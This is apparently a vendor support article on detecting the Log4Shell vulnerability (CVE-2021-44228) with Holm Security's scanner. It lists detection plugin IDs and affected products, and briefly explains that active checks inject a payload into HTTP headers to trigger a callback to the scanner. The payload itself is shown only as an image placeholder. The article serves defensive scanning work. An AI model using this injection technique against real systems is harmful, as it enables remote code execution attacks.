General

How does Holm Security support detection of the Log4j (Log4Shell) vulnerability?

Information about the vulnerability Log4j

General information

CVE-2021-44228 is a Remote Code Execution (RCE) vulnerability impacting Log4j version 2. The vulnerability is also known as Log4Shell.

Log4j is a common logging framework for Java-based applications which can be implemented by anyone who chooses to do it. Hence the impact of this vulnerability is widespread and impacts platforms and individual applications. 

Read more about this vulnerability in our blog

How to scan for this vulnerability

To check if your systems are affected by the Log4j 2 vulnerability you will need to run an Authenticated Network Scan using Holm Security VMP.

You will find detailed information about setting up your authenticated scanning profile in this article:
https://support.holmsecurity.com/hc/en-us/articles/212841809

And you can find more information in this section:
https://support.holmsecurity.com/knowledge/system-network-scanning

If your system is vulnerable, you will find one of the following HIDs in your generated scan report depending on your operating system:

  • HID-2-1-371879
  • HID-2-1-371866
  • HID-2-1-026309
  • HID-2-1-939587
  • HID-2-1-341380 (can be run unauthenticated, only on external scan nodes)
  • HID-2-1-341387
  • HID-2-1-341388
  • HID-2-1-341389
  • HID-2-1-371872
  • HID-2-1-341381
  • HID-2-1-341395
  • HID-2-1-341383
  • HID-2-1-341382
  • HID-2-1-5348677 Apache Log4j Version Detection (Windows) Authenticated
  • HID-2-1-5348688 (run unauthenticated, only on external scan nodes)
  • HID-2-1-5348682 (run unauthenticated, only on external scan nodes)
  • HID-2-1-5348681 (run unauthenticated, only on external scan nodes)
  • HID-2-1-5348680 (run unauthenticated, only on external scan nodes)
  • HID-2-1-5348683 (run unauthenticated, only on external scan nodes)
  • HID-2-1-5348686 (run unauthenticated, only on external scan nodes)
  • HID-2-1-5348685 (run unauthenticated, only on external scan nodes)
  • HID-2-1-5348689 (run unauthenticated, only on external scan nodes)
  • HID-2-1-939589 
  • HID-2-1-371836 
  • HID-2-1-371835 
  • HID-2-1-043901 
  • HID-2-1-043927 
  • HID-2-1-371827 
  • HID-2-1-5348693 
  • HID-2-1-5348694 
  • HID-2-1-371816 
  • HID-2-1-5348690 
  • HID-2-1-341309 
  • HID-2-1-5348691 
  • HID-2-1-5348698 
  • HID-2-1-5348687 
  • HID-2-1-079625 
  • HID-2-1-043933 
  • HID-2-1-079624 
  • HID-2-1-5348675 
  • HID-2-1-5348628
  • HID-2-1-5348617
  • HID-2-1-5348621
  • HID-2-1-5348699
  • HID-2-1-5348604
  • HID-2-1-5348619
  • HID-2-1-5348610
  • HID-2-1-5348613
  • HID-2-1-5348607
  • HID-2-1-5348614
  • HID-2-1-043947
  • HID-2-1-043943
  • HID-2-1-341318
  • HID-2-1-341317
  • HID-2-1-341302
  • HID-2-1-341303
  • HID-2-1-939581
  • HID-2-1-079632
  • HID-2-1-026319
  • HID-2-1-5348620
  • HID-2-1-5348618 
  • HID-2-1-5348629 

Released

  • ArcGIS Server Log4j RCE Vulnerability (000026951)- CVE-2021-44228
  • Cisco Identity Services Engine Log4j RCE Vulnerability (CSCwa47133)
  • Cisco Unified Communications Manager IM & Presence Service Log4j RCE Vulnerability (CSCwa47393)
  • Cisco Unified Communications Manager Log4j RCE Vulnerability (CSCwa47249)
  • IBM WebSphere Application Server Log4j RCE Vulnerability(6525706, Log4Shell)  - CVE-2021-44228
  • Ubuntu log4j Vulnerability CVE-2021-44228
  • Elastic Logstash Multiple Log4j Vulnerabilities (Dec 2021)
  • Apache Log4j 2.0.x Multiple Vulnerabilities (Linux/Unix, Log4Shell) - Version Check
  • Apache JSPWiki 2.11.0 Log4j RCE Vulnerability (Log4Shell) - Active Check
  • Apache JSPWiki 2.11.0 Log4j RCE Vulnerability (Log4Shell) - Version Check
  • Apache Log4j 1.2.x RCE Vulnerability (Windows, Dec 2021) - Version Check
  • Apache Log4j 1.2.x RCE Vulnerability (Linux/Unix, Dec 2021) - Version Check
  • Ubuntu: Security Advisory for apache-log4j2 (USN-5192-1)
  • Fedora: Security Advisory for log4j (FEDORA-2021-f0f501d01f)
  • Ubuntu: Security Advisory for apache-log4j2 (USN-5197-1)
  • Apache Log4j 2.0.x Multiple Vulnerabilities (Windows, Log4Shell) - Version Check
  • Fedora: Security Advisory for log4j (FEDORA-2021-66d6c484f3)
  • Fedora: Security Advisory for jansi (FEDORA-2021-66d6c484f3)
  • Apache Archiva < 2.2.6 Multiple Log4j Vulnerabilities (Log4Shell)
  • Apache Tika Server 2.x < 2.2.0 Log4j RCE Vunerability (Log4Shell)

VMware and Windows:

  • Apache Log4j Version Detection (Windows)
  • VMware vCenter Server 6.5, 6.7, 7.0 Log4j RCE Vulnerability (VMSA-2021-0028)
  • VMware vRealize Automation 7.6 and 8.x Log4j RCE Vulnerability (VMSA-2021-0028)
  • VMware vRealize Log Insight 8.2, 8.3, 8.4 and 8.6 Log4j RCE Vulnerability (VMSA-2021-0028)
  • VMware vRealize Operations 8.x Log4j RCE Vulnerability (VMSA-2021-0028)
  • VMware vRealize Orchestrator 7.6 and 8.x Log4j RCE Vulnerability (VMSA-2021-0028)
  • Wowza Streaming Engine Log4j RCE Vulnerability - CVE-2021-44228
  • Splunk Enterprise 8.1.x, 8.2.x Log4j RCE Vulnerability - CVE-2021-44228
  • Apache Solr 7.x, 8.x Log4j RCE Vulnerability - CVE-2021-44228
  • Cisco Webex Meetings Server Log4j RCE Vulnerability (CSCwa47283)

To scan for this vulnerability specifically you can set up a scan profile that includes the above HID specifically, for example:

mceclip0.png

How the active exploitation scripts works

In our active scripts, we try to exploit the Log4j vulnerability and force scanned targets to initiate a connection request with our scanner. In the case of HTTP active exploitation, for example, we try to inject specially crafted payload into different HTTP headers. The payload will look in this manner:

mceclip0.png

ownip is IP address of our scanner and random_port is the port we choose to receive a connection to.

Notice that you will need to whitelist port range 40,000-41,000 in your firewall rules as these are port ranges used by to receive a connection request for log4j exploitation. Vulnerability is reported when our scanner has detected a connection request from the target IP to the scanner IP on the selected port.

Besides active exploitation plugins, scripts can check for vulnerable log4j packages present on the target machine using authenticated scan.

Few examples of files that can be detected are:

  • # log4j-core-java9-2.13.3.pom
  • # log4j-2.13.3.pom
  • # log4j-core-2.13.3.jar
  • # log4j-core-2.13.3.pom etc

We also have a vast collection of enterprise applications coverage such as VMWare vCenter, VMWare vRealize, Splunk, Elastic Search, Cisco Webex, UCS, UCM, etc.